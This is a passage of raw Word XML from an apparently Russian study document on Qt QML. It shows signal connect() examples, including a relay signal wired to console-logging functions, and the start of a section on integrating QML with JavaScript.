        <w:t>connect()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> method</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a connect a signal either to a method or another signal.</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Rectangle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id: relay</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signal messageReceived(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> person, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> notice)</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Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.onCompleted: {</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relay.messageReceived.connect(sendToPost)</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        relay.messageReceived.connect(sendToTelegraph)</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relay.messageReceived.connect(sendToEmail)</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relay.messageReceived(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Tom"</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"Happy Birthday"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</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sendToPost(person, notice) {</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console.log(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Sending to post: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + person + </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + notice)</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sendToTelegraph(person, notice) {</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console.log(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Sending to telegraph: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + person + </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + notice)</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sendToEmail(person, notice) {</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console.log(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Sending to email: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + person + </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + notice)</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A46CFD" w:rsidRPr="00D815C8" w:rsidRDefault="00A46CFD" w:rsidP="00A46CFD">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A46CFD" w:rsidRPr="00D815C8" w:rsidRDefault="00A77838" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In many cases it is sufficient to receive signals through signal handlers rather than using the connect() function. However, using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> method allows a signal to be received by multiple methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown above, which would not be possible with signal handlers </w:t>
      </w:r>
      <w:r w:rsidR="00AE439B" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as they must be uniquely named.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE439B" w:rsidRPr="00D815C8" w:rsidRDefault="00AE439B" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By connecting signals to other signals, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> method </w:t>
      </w:r>
      <w:r w:rsidRPr="001E74FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can form </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>different signal chains</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E4201" w:rsidRPr="00D815C8" w:rsidRDefault="004E4201" w:rsidP="001E74FA">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc382058567"/>
      <w:bookmarkStart w:id="58" w:name="_Toc483000530"/>
      <w:bookmarkStart w:id="59" w:name="_Toc483003571"/>
      <w:bookmarkStart w:id="60" w:name="_Toc483603890"/>
      <w:bookmarkStart w:id="61" w:name="_Toc483605110"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ИНТЕГРИРОВАНИЕ </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> И </w:t>
      </w:r>
      <w:r w:rsidR="00D10A6A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>JAVA SCRIPT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-javascript-topic.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF0849" w:rsidRPr="00D815C8" w:rsidRDefault="00DF0849" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The QML language </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uses a JSON-like syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and allows v</w:t>
      </w:r>
      <w:r w:rsidRPr="001E74FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arious expressions and methods to be defined as JavaScript functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It also </w:t>
      </w:r>
      <w:r w:rsidRPr="001E74FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">allows users to import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript files</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use the functionality those imports provide.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF0849" w:rsidRPr="00D815C8" w:rsidRDefault="00DF0849" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This allows developers and designers to leverage the knowledge they have of JavaScript to quickly develop both user-interfaces and application logic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF0849" w:rsidRPr="00D815C8" w:rsidRDefault="00DF0849" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML has a deep JavaScript integration, and allows</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:anchor="signal-attributes" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>signal handlers</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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:anchor="method-attributes" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>methods</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to be defined in JavaScript. Another core feature of QML is the ability to specify and enforce relationships between object properties using</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property bindings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which are also defined using JavaScript.</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highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript using context in QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
